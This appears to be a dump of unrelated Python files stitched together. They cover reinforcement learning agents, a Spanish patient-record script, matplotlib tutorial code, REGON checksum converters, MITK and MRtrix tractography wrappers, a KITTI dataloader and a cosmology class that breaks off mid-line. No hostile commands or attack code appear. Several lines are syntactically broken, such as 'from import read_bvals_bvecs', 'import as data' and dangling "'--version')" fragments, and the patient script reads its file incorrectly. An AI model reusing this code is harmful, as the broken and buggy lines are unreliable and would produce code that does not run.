<reponame>wwxFromTju/malib<gh_stars>1-10 from malib.value_functions.value_function import ( MLPValueFunction, CommNetValueFunction, BiCNetValueFunction, ) # __all__ = ["MLPValueFunction"]
<filename>scripts/ #!/usr/bin/env python2 # -*- coding: UTF-8 -*- # File: # Date: Thu Sep 18 15:43:36 2014 -0700 # Author: <NAME> <<EMAIL>> import numpy as np from scipy.misc import imread, imsave from itertools import izip import sys, os import shutil import os.path import glob if len(sys.argv) != 3: print "Usage: {0} <input directory with images> <model>".format(sys.argv[0]) sys.exit(0) sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '../'))) from network_runner import NetworkRunner, get_nn from lib.imageutil import get_image_matrix from dataio import read_data from lib.progress import Progressor input_dir = sys.argv[1] output_dir = os.path.join(input_dir, 'predicted') shutil.rmtree(output_dir, ignore_errors=True) os.mkdir(output_dir) print "Reading images from {0}".format(input_dir) print "Writing predicted results to {0}".format(output_dir) model_file = sys.argv[2] nn = get_nn(model_file) print "Running network with model {0}".format(model_file) # Run the network against a directory of images, # and put predicted label in the filename tot, corr = 0, 0 for f in glob.glob(input_dir + '/*'): if not os.path.isfile(f): continue img = imread(f) / 255.0 pred = nn.predict(img) label = f.split('-')[-1].split('.')[0] new_fname = "{:04d}:{}-{},{}.png".format(tot, label, pred[0], ''.join(map(str, pred[1:]))) imsave(os.path.join(output_dir, new_fname), img) tot += 1 corr += label == ''.join(map(str, pred[1:1+pred[0]])) if tot > 0 and tot % 1000 == 0: print "Progress:", tot print corr, tot
class RelationType(object): ONE_TO_MANY = "one_to_many" ONE_TO_ONE = "one_to_one" class Relation(object): def __init__(self, cls): self.cls = cls class HasOne(Relation): def get(self, id): return self.cls.get(id=id) class HasMany(Relation): def get(self, id): value = [] tokens = id.split(",") for token in tokens: value += (self.cls.get(id=token.strip())) return value
<filename>chapter09/idqn/<gh_stars>0 import numpy as np import tensorflow as tf from tensorflow import keras from idqn.dqn_agent import DQNAgent class DoubleDQNAgent(DQNAgent): def __init__(self, env, config): """ :param env: the gym environment where the agent will run :param config: a set of hyperparameters """ super().__init__(env, config) def train(self, observations, actions, rewards, next_observations, dones): # Use the online network to select the best actions for the next observations next_q_values = self.q_network.predict(next_observations) best_next_actions = np.argmax(next_q_values, axis=1) # Use the target network to estimate the Q-values of these best actions next_best_q_values = self.target_network.predict(next_observations) next_best_q_values = next_best_q_values[np.arange(len(next_best_q_values)), best_next_actions] target_q_values = rewards + (1 - dones) * self.config.gamma * next_best_q_values with tf.GradientTape() as tape: # Forward pass: compute the Q-values for the observations in the batch all_q_values = self.q_network(observations) # Mask out the Q-values for the non-chosen actions mask = tf.one_hot(actions, self.n_actions) q_values = tf.reduce_sum(all_q_values * mask, axis=1) # Compute the loss between the targets and the Q-values loss_fn = keras.losses.Huber() loss = loss_fn(target_q_values, q_values) # Perform a gradient descent step to minimize the loss with respect # to the model's trainable variables gradients = tape.gradient(loss, self.q_network.trainable_variables) self.optimizer.apply_gradients(zip(gradients, self.q_network.trainable_variables))
import os def crear_dni(): #Se solicita un valor y tras las validaciones para verificar si es un dni, se lo devuelve. valor = False while valor == False: try: dni = input("[?] Por favor, ingrese su DNI: ") if int(dni) > 1000000 and int(dni) < 200000000: valor = True except ValueError: print("[!] Ingresaste un valor no valido.") return dni def escribir_archivo(lista): with open("Pacientes.txt","a") as pacientes: pacientes.write(f"{lista}\n") def leer_archivo(): f = open ("Pacientes.txt", "r") paciente = f.close() return paciente def borrar_archivo(): with open("Pacientes.txt","a") as pacientes: pacientes.truncate(0) def lista(): pacientes = leer_archivo() listar = pacientes.split("\n") return listar def buscar_dni(dni): lista_pacientes = lista() for i in range (len(lista_pacientes)): paciente = lista_pacientes[i] buscar = paciente.find(dni) if buscar != -1: return i elif buscar == -1: return buscar def modificar_paciente(dni): ubicacion = buscar_dni(dni) if ubicacion == -1: return -1 lista_pacientes = lista() lista_paciente= lista_pacientes[ubicacion].split(";") pregunta = int(input("[?] Que desea cambiar? [1] El DNI. [2] El nombre. [3] la edad. [0] Todos. [-1] Nada.")) if pregunta == 1: lista_pacientes = lista_pacientes.pop(ubicacion) lista_paciente[pregunta-1] = crear_dni() if pregunta == 2: lista_pacientes = lista_pacientes.pop(ubicacion) nombre = input("[?] Ingrese su nombre por favor: ") while nombre.isdigit(): nombre = input("[?] Ingrese su nombre por favor, solo letras: ") lista_paciente[pregunta-1] = nombre if pregunta == 3: lista_pacientes = lista_pacientes.pop(ubicacion) edad = input("[?] Edad: ") while edad.isdigit() == False: edad = input("[?] Ingrese su edad nuevamente. Solo numeros: ") while int(edad) <= 17: print("[!] Error, no se le puede inscribir si es menor de 17.") edad = input("[?] Ingrese su edad nuevamente: ") lista_paciente[pregunta-1] = edad if pregunta == 0: lista_pacientes = lista_pacientes.pop(ubicacion) lista_paciente[0] = crear_dni() nombre = input("[?] Ingrese su nombre por favor: ") while nombre.isdigit(): nombre = input("[?] Ingrese su nombre por favor, solo letras: ") lista_paciente[1] = nombre edad = input("[?] Edad: ") while edad.isdigit() == False: edad = input("[?] Ingrese su edad nuevamente. Solo numeros: ") while int(edad) <= 17: print("[!] Error, no se le puede inscribir si es menor de 17.") edad = input("[?] Ingrese su edad nuevamente: ") lista_paciente[2] = edad return lista_paciente def modificar_lista(dni): valor = modificar_paciente(dni) if valor == -1: print("[!] No se ha encontrado el DNI, volviendo a la pantalla anterior.") return lista_original = lista() ubicacion = buscar_dni(dni) lista_original.pop(ubicacion) lista_original.insert(ubicacion,valor) lista_str = str(lista_original) lista_str.replace("["," ") lista_str.replace("]"," ") lista_str.replace("'"," ") return lista_original def main(dni): valor = buscar_dni(dni) if valor == -1: return lista = modificar_lista(dni) borrar_archivo() escribir_archivo(lista) dni = input("¿Cual es el DNI que desea modificar?") main(dni)
<reponame>zhangnian/fastapi from blinker import signal from fastapi.signals.signal_handler import * sig_user = signal('userinfo_modifiy') def register_signal_handlers(): sig_user.connect(on_userinfo_modify)
# chapter Matplotlib Plotting ''' The plot() function is used to draw points (markers) in a diagram. By default, the plot() function draws a line from point to point. The function takes parameters for specifying points in the diagram. Parameter 1 is an array containing the points on the x-axis. Parameter 2 is an array containing the points on the y-axis. If we need to plot a line from (1, 3) to (8, 10), we have to pass two arrays [1, 8] and [3, 10] to the plot function. ''' # Draw a line in a diagram from position (1, 3) to position (8, 10): import matplotlib.pyplot as plt import numpy as r import sys x=r.array([1,9,]) y=r.array([4,10]) plt.plot(x,y) ''' Plotting Without Line To plot only the markers, you can use shortcut string notation parameter 'o', which means 'rings'. ''' x=r.array([3,10]) y=r.array([0,34]) plt.plot(x,y,'o') ''' Multiple Points You can plot as many points as you like, just make sure you have the same number of points in both axis. Example Draw a line in a diagram from position (1, 3) to (2, 8) then to (6, 1) and finally to position (8, 10):f ''' x=r.array([1,2,4,9]) y=r.array([3,6,8,10]) plt.plot(x,y,label="red") #Two lines to make our compiler able to draw: plt.savefig(sys.stdout.buffer) sys.stdout.flush() ''' Default X-Points If we do not specify the points in the x-axis, they will get the default values 0, 1, 2, 3, (etc. depending on the length of the y-points. So, if we take the same example as above, and leave out the x-points, the diagram will look like this: ''' # Plotting without x-points: ypoints=r.array([0,2,3,5,6,7,99]) plt.plot(ypoints) plt.savefig(sys.stdout.buffer) sys.stdout.flush() # CHAPTER Matplotlib Markers ''' Markers You can use the keyword argument marker to emphasize each point with a specified marker: ''' x=r.array([0,3,5,6,8,9]) y=r.array([2,4,6,7,8,10]) plt.plot(x,y,marker="*") ''' Marker Reference You can choose any of these markers: Marker Description 'o' Circle '*' Star '.' Point ',' Pixel 'x' X 'X' X (filled) '+' Plus 'P' Plus (filled) 's' Square 'D' Diamond 'd' Diamond (thin) 'p' Pentagon 'H' Hexagon 'h' Hexagon 'v' Triangle Down '^' Triangle Up '<' Triangle Left '>' Triangle Right '1' Tri Down '2' Tri Up '3' Tri Left '4' Tri Right '|' Vline '_' Hline ''' ''' Format Strings fmt You can use also use the shortcut string notation parameter to specify the marker. This parameter is also called fmt, and is written with this syntax: marker|line|color Example Mark each point with a circle: ''' x=r.array([3,5,5,6,7,8]) y=r.array([1,3,5,6,7,8]) plt.plot(x,y,'-.r') ''' The marker value can be anything from the Marker Reference above. The line value can be one of the following: Line Reference Line Syntax Description '-' Solid line ':' Dotted line '--' Dashed line '-.' Dashed/dotted line Note: If you leave out the line value in the fmt parameter, no line will be plottet. ''' ''' Color Reference Color Syntax Description 'r' Red 'g' Green 'b' Blue 'c' Cyan 'm' Magenta 'y' Yellow 'k' Black 'w' White ''' ''' Marker Size You can use the keyword argument markersize or the shorter version, ms to set the size of the markers: ''' x=r.array([1,3,4,5,9,5]) y=r.array([0,3,6,8,8]) plt.plot(x,marker='o',ms='17') ''' Marker Color You can use the keyword argument markeredgecolor or the shorter mec to set the color of the edge of the markers: Example Set the EDGE color to red: ''' x=r.array([2,3,5,6]) y=r.array('[0,3,5,6,8]') plt.plot(x,marker='*',ms=34,mec='r') ''' You can use the keyword argument markerfacecolor or the shorter mfc to set the color inside the edge of the markers: Example Set the FACE color to red: ''' x=r.array([1,3,5,6]) y=r.array([2,3,5,6]) plt.plot(x,marker='*',ms=34,mfc='r') ''' # Use both the mec and mfc arguments to color of the entire marker: # Example # Set the color of both the edge and the face to red: ''' import matplotlib.pyplot as plt import numpy as r y=r.array([0,4,6,7,7,8]) plt.plot(y,marker='*',ms=30,mec='r',mfc='r') ''' You can also use Hexadecimal color values: Example Mark each point with a beautiful green color: ... plt.plot(ypoints, marker = 'o', ms = 20, mec = '#4CAF50', mfc = '#4CAF50') ... ''' import matplotlib.pyplot as plt import numpy as np x=np.array([1,2,3,4,5,6,5,7]) y=np.array([1,2,4,5,5,6,]) plt.plot(y,ms=34,marker='*',mec='hotpink',mfc="hotpink",linestyle=':')
#!/bin/env python # import the technology's complete stack definition from example import stack # in order to decrease simulation times, some metal layers can be removed from # the stack, allowing more oxide layers to be merged in the next step stack.remove_metal_layer_by_name('PO1') stack.remove_metal_layer_by_name('ME1') stack.remove_metal_layer_by_name('ME2') stack.remove_metal_layer_by_name('ME3') stack.remove_metal_layer_by_name('ME4') #stack.remove_metal_layer_by_name('ME5') #stack.remove_metal_layer_by_name('ME6') if __name__ == '__main__': # Print the standardized stack to example_ME5ME6_std.pdf stack.draw('example_ME5ME6_std', pages=3, single_page=True) # Merge oxide layers to reduce the stack's complexity, decreasing simulation # times stack.simplify() if __name__ == '__main__': # Print the simplified stack to example_ME5ME6.pdf stack.draw('example_ME5ME6', pages=3, single_page=True) # Write out a Momentum subtrate definition file of the simplified stack # write_momentum_substrate argument: filename (without extension), # infinite ground plane # NOTE: this might produce bad output when the stack has not been # simplified before! stack.write_momentum_substrate('example_ME5ME6', True) # Write out a Sonnet project that includes the simplified subtrate stack # write_sonnet_technology argument: filename (without extension) # NOTE: this might produce bad output when the stack has not been # simplified before! stack.write_sonnet_technology('example_ME5ME6')
<reponame>erikamaylim/Python-CursoemVideo """Faça um programa que tenha uma função notas() que pode receber várias notas de alunos e vai retornar um dicionário com as seguintes informações: – Quantidade de notas - A maior nota – A menor nota – A média da turma – A situação (opcional)""" def notas(* num, s=False): """ -> Função para coletar notas dos alunos e retornar informações gerais e a situação da turma. :param num: Notas da turma :param s: Situação (Boa, Razoável ou Ruim) :return: dicionário com informações sobre a turma """ soma = sum(num) qtd = len(num) maior = max(num) menor = min(num) media = soma / qtd if media >= 6: sit = 'Boa' elif media >= 5: sit = 'Razoável' else: sit = 'Ruim' total = {'Quantidade de notas': qtd, 'Maior nota': maior, 'Menor nota': menor, 'Média': media} if s: total['Situação'] = sit return total print(notas(2, 3, 5, 4, 1, 3, s=True)) print(notas(10, 7, 8, 10, s=True)) print(notas(4, 6, 7, 5, 6.5, 7, 5)) help(notas)
<gh_stars>1-10 from Pluto.Systems.Systems import *
<reponame>damianwasik98/RegonAPI """ Converters of codes """ from string import digits from .exceptions import RegonConvertionError from . import validators REGON9_WEIGHTS = [8, 9, 2, 3, 4, 5, 6, 7] REGON14_WEIGHTS = [2, 4, 8, 5, 0, 9, 7, 3, 6, 1, 2, 4, 8] def regon8_to_9(regon8): """Convert REGON8 to REGON9 Parameters ---------- regon8 : str REGON8 Returns ------- str REGON9 Raises ------ RegonConvertionError If regon8 is not valid """ if not validators.is_valid_regon8(regon8): raise RegonConvertionError(regon8) a, b = list(regon8), REGON9_WEIGHTS a = list(map(lambda x: int(x), a)) last_digit = sum(list(map(lambda x: x[0] * x[1], zip(a, b)))) % 11 regon9 = "{regon8}{last_digit}".format(regon8=regon8, last_digit=last_digit) return regon9 def regon13_to_14(regon13): """Convert REGON13 to REGON14 Parameters ---------- regon13 : str REGON13 Returns ------- str REGON14 Raises ------ RegonConvertionError If regon13 is not valid """ if not validators.is_valid_regon13(regon13): raise RegonConvertionError(regon13) a, b = list(regon13), REGON14_WEIGHTS a = list(map(lambda x: int(x), a)) last_digit = sum(list(map(lambda x: x[0] * x[1], zip(a, b)))) % 11 regon14 = "{regon13}{last_digit}".format(regon13=regon13, last_digit=last_digit) return regon14
<gh_stars>1-10 from cmdint import CmdInterface import numpy as np from shutil import copyfile from import read_bvals_bvecs import os """ This exapmple contains two classes that help with fiber tractography using MITK Diffusion and MRtrix. It is only intended as a larger example of multiple usages of CmdInterface and NOT (yet) as a polished class that wraps command line tools for fiber tractography and diffusion signal modelling. """ def flip_bvecs(input_dwi: str, output_dwi: str): bvals, bvecs = read_bvals_bvecs(input_dwi.replace('.nii.gz', '.bvals'), input_dwi.replace('.nii.gz', '.bvecs')) bvecs[:, 0] *= -1 np.savetxt(output_dwi.replace('.nii.gz', '.bvecs'), np.transpose(bvecs), fmt='%10.6f') copyfile(input_dwi, output_dwi) copyfile(input_dwi.replace('.nii.gz', '.bvals'), output_dwi.replace('.nii.gz', '.bvals')) class MitkTrackingHelper: def __init__(self): pass @staticmethod def recon_qball(input_dwi, out_folder, sh_order: int, do_flip_bvecs: bool): """ Perform analytical q-ball reconstruction with solid angle consideration and output the resulting spherical harmonics ODFs. """ os.makedirs(out_folder, exist_ok=True) if do_flip_bvecs: flipper = CmdInterface(flip_bvecs) flipper.add_arg('input_dwi', input_dwi, check_input=True) input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder) input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz') flipper.add_arg('output_dwi', input_dwi, check_output=True) qball_recon = CmdInterface('MitkQballReconstruction') qball_recon.add_arg(key='-i', arg=input_dwi, check_input=True) qball_recon.add_arg(key='-o', arg=out_folder + 'odf_qball_mitk.nii.gz', check_output=True) qball_recon.add_arg(key='--sh_order', arg=sh_order) return out_folder + 'odf_qball_mitk.nii.gz' @staticmethod def recon_tensor(input_dwi: str, out_folder: str, do_flip_bvecs: bool = False): """ Perform diffusion tesnor modelling of the signal. """ os.makedirs(out_folder, exist_ok=True) if do_flip_bvecs: flipper = CmdInterface(flip_bvecs) flipper.add_arg('input_dwi', input_dwi, check_input=True) input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder) input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz') flipper.add_arg('output_dwi', input_dwi, check_output=True) tensor_recon = CmdInterface('MitkTensorReconstruction') tensor_recon.add_arg(key='-i', arg=input_dwi, check_input=True) tensor_recon.add_arg(key='-o', arg=out_folder + 'tensors_mitk.dti', check_output=True) return out_folder + 'tensors_mitk.dti' @staticmethod def train_rf(i: str, t: str, out_folder: str, masks: str = None, wm_masks: str = None, volume_modification_images: str = None, additional_feature_images: str = None, num_trees: int = 30, max_tree_depth: int = 25, sample_fraction: float = 0.7, use_sh_features: bool = 0, sampling_distance: float = None, max_wm_samples: int = None, num_gm_samples: int = None): """ Train a random forest for machine learning based tractography. i: input diffusion-weighted images t: input training tractograms o: output random forest (HDF5) masks: restrict training using a binary mask image (optional) wm_masks: if no binary white matter mask is specified volume_modification_images: specify a list of float images that modify the fiber density (optional) additional_feature_images: specify a list of float images that hold additional features (float) (optional) num_trees: number of trees (optional) max_tree_depth: maximum tree depth (optional) sample_fraction: fraction of samples used per tree (optional) use_sh_features: use SH features (optional) sampling_distance: resampling parameter for the input tractogram in mm (determines number of white-matter samples) (optional) max_wm_samples: upper limit for the number of WM samples (optional) num_gm_samples: Number of gray matter samples per voxel (optional) """ runner = CmdInterface('MitkRfTraining') runner.add_arg(key='-i', arg=i, check_input=True) runner.add_arg(key='-t', arg=t, check_input=True) runner.add_arg(key='-o', arg=out_folder + 'forest_mitk.rf', check_output=True) if masks is not None: runner.add_arg(key='--masks', arg=masks) if wm_masks is not None: runner.add_arg(key='--wm_masks', arg=wm_masks) if volume_modification_images is not None: runner.add_arg(key='--volume_modification_images', arg=volume_modification_images) if additional_feature_images is not None: runner.add_arg(key='--additional_feature_images', arg=additional_feature_images) if num_trees is not None: runner.add_arg(key='--num_trees', arg=num_trees) if max_tree_depth is not None: runner.add_arg(key='--max_tree_depth', arg=max_tree_depth) if sample_fraction is not None: runner.add_arg(key='--sample_fraction', arg=sample_fraction) if use_sh_features is not None: runner.add_arg(key='--use_sh_features', arg=use_sh_features) if sampling_distance is not None: runner.add_arg(key='--sampling_distance', arg=sampling_distance) if max_wm_samples is not None: runner.add_arg(key='--max_wm_samples', arg=max_wm_samples) if num_gm_samples is not None: runner.add_arg(key='--num_gm_samples', arg=num_gm_samples) return out_folder + 'forest_mitk.rf' @staticmethod def track_streamline(i: str, out_folder: str, algorithm: str, flip_x: bool = False, flip_y: bool = False, flip_z: bool = False, no_data_interpolation: bool = False, no_mask_interpolation: bool = False, compress: float = None, seeds: int = 1, seed_image: str = None, trials_per_seed: int = 10, max_tracts: int = -1, tracking_mask: str = None, stop_image: str = None, exclusion_image: str = None, ep_constraint: str = None, target_image: str = None, sharpen_odfs: bool = False, cutoff: float = 0.1, odf_cutoff: float = 0, step_size: float = 0.5, min_tract_length: float = 20, angular_threshold: float = None, loop_check: float = None, prior_image: str = None, prior_weight: float = 0.5, restrict_to_prior: bool = False, new_directions_from_prior: bool = False, num_samples: int = 0, sampling_distance: float = 0.25, use_stop_votes: bool = False, use_only_forward_samples: bool = False, tend_f: float = 1, tend_g: float = 0, forest: str = None, use_sh_features: bool = False, additional_images: str = None): """ Perform MITK streamline tractography. i: input image (multiple possible for 'DetTensor' algorithm) out_folder: output folder algorithm: which algorithm to use (Peaks flip_x: multiply x-coordinate of direction proposal by -1 (optional) flip_y: multiply y-coordinate of direction proposal by -1 (optional) flip_z: multiply z-coordinate of direction proposal by -1 (optional) no_data_interpolation: don't interpolate input image values (optional) no_mask_interpolation: don't interpolate mask image values (optional) compress: compress output fibers using the given error threshold (in mm) (optional) seeds: number of seed points per voxel (optional) seed_image: mask image defining seed voxels (optional) trials_per_seed: try each seed N times until a valid streamline is obtained (only for probabilistic tractography) (optional) max_tracts: tractography is stopped if the reconstructed number of tracts is exceeded (optional) tracking_mask: streamlines leaving the mask will stop immediately (optional) stop_image: streamlines entering the mask will stop immediately (optional) exclusion_image: streamlines entering the mask will be discarded (optional) ep_constraint: determines which fibers are accepted based on their endpoint location - options are NONE target_image: effact depends on the chosen endpoint constraint (option ep_constraint) (optional) sharpen_odfs: if you are using dODF images as input cutoff: set the FA odf_cutoff: threshold on the ODF magnitude. this is useful in case of CSD fODF tractography. (optional) step_size: step size (in voxels) (optional) min_tract_length: minimum fiber length (in mm) (optional) angular_threshold: angular threshold between two successive steps loop_check: threshold on angular stdev over the last 4 voxel lengths (optional) prior_image: tractography prior in thr for of a peak image (optional) prior_weight: weighting factor between prior and data. (optional) restrict_to_prior: restrict tractography to regions where the prior is valid. (optional) new_directions_from_prior: the prior can create directions where there are none in the data. (optional) num_samples: number of neighborhood samples that are use to determine the next progression direction (optional) sampling_distance: distance of neighborhood sampling points (in voxels) (optional) use_stop_votes: use stop votes (optional) use_only_forward_samples: use only forward samples (optional) tend_f: weighting factor between first eigenvector (f=1 equals FACT tracking) and input vector dependent direction (f=0). (optional) tend_g: weighting factor between input vector (g=0) and tensor deflection (g=1 equals TEND tracking) (optional) forest: input random forest (HDF5 file) (optional) use_sh_features: use SH features (optional) additional_images: specify a list of float images that hold additional information (FA """ os.makedirs(out_folder, exist_ok=True) tracts = out_folder + os.path.basename(i).split('.')[0] + '_' + algorithm + '_mitk.trk' runner = CmdInterface('MitkStreamlineTractography') runner.add_arg(key='-i', arg=i, check_input=True) runner.add_arg(key='-o', arg=tracts, check_output=True) runner.add_arg(key='--algorithm', arg=algorithm) if flip_x: runner.add_arg(key='--flip_x') if flip_y: runner.add_arg(key='--flip_y') if flip_z: runner.add_arg(key='--flip_z') if no_data_interpolation: runner.add_arg(key='--no_data_interpolation') if no_mask_interpolation: runner.add_arg(key='--no_mask_interpolation') if compress is not None: runner.add_arg(key='--compress', arg=compress) if seeds is not None: runner.add_arg(key='--seeds', arg=seeds) if seed_image is not None: runner.add_arg(key='--seed_image', arg=seed_image) if trials_per_seed is not None: runner.add_arg(key='--trials_per_seed', arg=trials_per_seed) if max_tracts is not None: runner.add_arg(key='--max_tracts', arg=max_tracts) if tracking_mask is not None: runner.add_arg(key='--tracking_mask', arg=tracking_mask) if stop_image is not None: runner.add_arg(key='--stop_image', arg=stop_image) if exclusion_image is not None: runner.add_arg(key='--exclusion_image', arg=exclusion_image) if ep_constraint is not None: runner.add_arg(key='--ep_constraint', arg=ep_constraint) if target_image is not None: runner.add_arg(key='--target_image', arg=target_image) if sharpen_odfs: runner.add_arg(key='--sharpen_odfs') if cutoff is not None: runner.add_arg(key='--cutoff', arg=cutoff) if odf_cutoff is not None: runner.add_arg(key='--odf_cutoff', arg=odf_cutoff) if step_size is not None: runner.add_arg(key='--step_size', arg=step_size) if min_tract_length is not None: runner.add_arg(key='--min_tract_length', arg=min_tract_length) if angular_threshold is not None: runner.add_arg(key='--angular_threshold', arg=angular_threshold) if loop_check is not None: runner.add_arg(key='--loop_check', arg=loop_check) if prior_image is not None: runner.add_arg(key='--prior_image', arg=prior_image) if prior_weight is not None: runner.add_arg(key='--prior_weight', arg=prior_weight) if restrict_to_prior: runner.add_arg(key='--restrict_to_prior') if new_directions_from_prior: runner.add_arg(key='--new_directions_from_prior') if num_samples is not None: runner.add_arg(key='--num_samples', arg=num_samples) if sampling_distance is not None: runner.add_arg(key='--sampling_distance', arg=sampling_distance) if use_stop_votes: runner.add_arg(key='--use_stop_votes') if use_only_forward_samples: runner.add_arg(key='--use_only_forward_samples') if tend_f is not None: runner.add_arg(key='--tend_f', arg=tend_f) if tend_g is not None: runner.add_arg(key='--tend_g', arg=tend_g) if forest is not None: runner.add_arg(key='--forest', arg=forest) if use_sh_features: runner.add_arg(key='--use_sh_features') if additional_images is not None: runner.add_arg(key='--additional_images', arg=additional_images) return tracts @staticmethod def mitkglobaltractography(i: str, out_folder: str, parameters: str, mask: str = None): """ Perform MITK global tractography. Save a paramter file for usage using the MITK Diffusion GUI application. i: input image (tensor out_folder: output folder parameters: parameter file (.gtp) mask: binary mask image (optional) """ os.makedirs(out_folder, exist_ok=True) tracts = out_folder + os.path.basename(i).split('.')[0] + '_Global_mitk.trk' runner = CmdInterface('MitkGlobalTractography') runner.add_arg(key='-i', arg=i, check_input=True) runner.add_arg(key='-o', arg=tracts, check_output=True) runner.add_arg(key='--parameters', arg=parameters) if mask is not None: runner.add_arg(key='--mask', arg=mask, check_input=True) return tracts class MRtrixTrackingHelper: @staticmethod def recon_csd(input_dwi: str, do_flip_bvecs: bool, out_folder: str, algo: str = 'tournier'): """ Perform constrained spherical deconvolution modelling and output the resulting spherical harmonics fODFs. """ os.makedirs(out_folder, exist_ok=True) if do_flip_bvecs: flipper = CmdInterface(flip_bvecs) flipper.add_arg('input_dwi', input_dwi, check_input=True) input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder) input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz') flipper.add_arg('output_dwi', input_dwi, check_output=True) csd_algo = 'csd' num_responses = 1 if algo != 'tournier': num_responses = 3 csd_algo = 'msmt_csd' dwi2response = CmdInterface('dwi2response') dwi2response.add_arg(arg=algo) dwi2response.add_arg(arg=input_dwi, check_input=True) for i in range(num_responses): dwi2response.add_arg(arg=out_folder + 'response_' + algo + '_' + str(i) + '_mrtrix.txt', check_output=True) dwi2response.add_arg(key='-force') dwi2response.add_arg('-nthreads', 12) dwi2response.add_arg(key='-fslgrad', arg=[input_dwi.replace('.nii.gz', '.bvecs'), input_dwi.replace('.nii.gz', '.bvals')], check_input=True) dwi2fod = CmdInterface('dwi2fod') dwi2fod.add_arg(arg=csd_algo) dwi2fod.add_arg(arg=input_dwi, check_input=True) for i in range(num_responses): dwi2fod.add_arg(arg=out_folder + 'response_' + algo + '_' + str(i) + '_mrtrix.txt', check_input=True) dwi2fod.add_arg(arg=out_folder + 'odf_' + csd_algo + '_' + str(i) + '_mrtrix.nii.gz', check_output=True) dwi2fod.add_arg(key='-force') dwi2fod.add_arg('-nthreads', 12) dwi2fod.add_arg(key='-fslgrad', arg=[input_dwi.replace('.nii.gz', '.bvecs'), input_dwi.replace('.nii.gz', '.bvals')], check_input=True)'--version') return out_folder + 'odf_' + csd_algo + '_' + str(0) + '_mrtrix.nii.gz' sh2peaks = CmdInterface('sh2peaks') sh2peaks.add_arg(arg=out_folder + 'odf_' + csd_algo + '_0_mrtrix.nii.gz', check_input=True) sh2peaks.add_arg(arg=out_folder + 'peaks_' + csd_algo + '_0_mrtrix.nii.gz', check_output=True) sh2peaks.add_arg('-threshold', 0.1)'--version') flipper = CmdInterface('MitkFlipPeaks') flipper.add_arg('-i', out_folder + 'peaks_' + csd_algo + '_0_mrtrix.nii.gz', check_input=True) flipper.add_arg('-o', out_folder + 'peaks_' + csd_algo + '_0_flipped_mrtrix.nii.gz', check_output=True) flipper.add_arg('-z') @staticmethod def track_streamline(input_image: str, out_folder: str, algo: str, num_streamlines: int, cutoff: float = 0.1, minlength: int = 30, maxlength: int = 200, step: float = None, angle: float = None): """ Perform MRtrix streamline tractography. """ os.makedirs(out_folder, exist_ok=True) tracts = out_folder + os.path.basename(input_image).split('.')[0] + '_' + algo + '_mrtrix' tckgen = CmdInterface('tckgen') tckgen.add_arg(arg=input_image, check_input=True) if algo == 'Tensor_Det' or algo == 'Tensor_Prob': print(algo + ' NOT IMPLEMENTED') exit() tckgen.add_arg(key='-fslgrad', arg=[input_image.replace('.nii.gz', '.bvecs'), input_image.replace('.nii.gz', '.bvals')]) tckgen.add_arg(arg=tracts + '.tck', check_output=True) tckgen.add_arg('-algorithm', algo) tckgen.add_arg('-seed_dynamic', input_image) tckgen.add_arg('-nthreads', 12) tckgen.add_arg('-select', num_streamlines) tckgen.add_arg('-minlength', minlength) tckgen.add_arg('-maxlength', maxlength) tckgen.add_arg('-cutoff', cutoff) if step is not None: tckgen.add_arg('-step', step) if angle is not None: tckgen.add_arg('-angle', angle) tckgen.add_arg('-force')'--version') postproc = CmdInterface('MitkFiberProcessing') postproc.add_arg('-i', tracts + '.tck', check_input=True) postproc.add_arg('--compress', 0.1) postproc.add_arg('-o', tracts + '.trk', check_output=True) return tracts + '.trk'
if __name__ == '__main__': import sys import pickle from multiprocessing import current_process from multiprocessing.spawn import import_main_path data = pickle.load(sys.stdin.buffer) current_process().authkey = data['authkey'] sys.path = data['path'] import_main_path(data['main']) impl = pickle.loads(data['impl']) from pulsar.async.concurrency import run_actor run_actor(impl)
<reponame>ne3x7/VCN import as data import pdb from PIL import Image import os import os.path import numpy as np IMG_EXTENSIONS = [ '.jpg', '.JPG', '.jpeg', '.JPEG', '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP', ] def is_image_file(filename): return any(filename.endswith(extension) for extension in IMG_EXTENSIONS) def dataloader(filepath, typ = 'train'): left_fold = 'image_2/' right_fold = 'image_3/' disp_L = 'disp_occ_0/' disp_R = 'disp_occ_1/' image = [img for img in os.listdir(filepath+left_fold) if img.find('_10') > -1] image = sorted(image) imglist = [1,3,6,20,26,35,38,41,43,44,49,60,67,70,81,84,89,97,109,119,122,123,129,130,132,134,141,144,152,158,159,165,171,174,179,182, 184,186,187,196] if typ == 'train': train = [image[i] for i in range(200) if i not in imglist] elif typ == 'trainval': train = [image[i] for i in range(200)] val = [image[i] for i in imglist] left_train = [filepath+left_fold+img for img in train] right_train = [filepath+right_fold+img for img in train] disp_train_L = [filepath+disp_L+img for img in train] #disp_train_R = [filepath+disp_R+img for img in train] left_val = [filepath+left_fold+img for img in val] right_val = [filepath+right_fold+img for img in val] disp_val_L = [filepath+disp_L+img for img in val] #disp_val_R = [filepath+disp_R+img for img in val] return left_train, right_train, disp_train_L, left_val, right_val, disp_val_L
from pyHalo.Rendering.SpatialDistributions.uniform import LensConeUniform import numpy as np from copy import deepcopy from pyHalo.Rendering.MassFunctions.power_law import GeneralPowerLaw from pyHalo.Rendering.rendering_class_base import RenderingClassBase class TwoHaloContribution(RenderingClassBase): """ This class adds correlated structure associated with the host dark matter halo. The amount of structure added is proportional to b * corr, where b is the halo bias as computed by Sheth and Tormen (1999) and corr is the matter-matter correlation function. Currently, this term is implemented as a rescaling of the background density by b * corr, where the product is the average value computed over 2*dz, where dz is the spacing of the redshift planes adjacent the redshift plane of the main deflector. """ def __init__(self, keywords_master, halo_mass_function, geometry, lens_cosmo, lens_plane_redshifts, delta_z_list): self._rendering_kwargs = self.keyword_parse_render(keywords_master) self.halo_mass_function = halo_mass_function self.geometry = geometry self.lens_cosmo = lens_cosmo self.spatial_distribution_model = LensConeUniform(keywords_master['cone_opening_angle'], geometry) self._lens_plane_redshifts = lens_plane_redshifts self._delta_z_list = delta_z_list super(TwoHaloContribution, self).__init__() def render(self): """ Generates halo masses and positions for correlated structure around the main deflector :return: mass (in Msun), x (arcsec), y (arcsec), r3d (kpc), redshift """ idx = 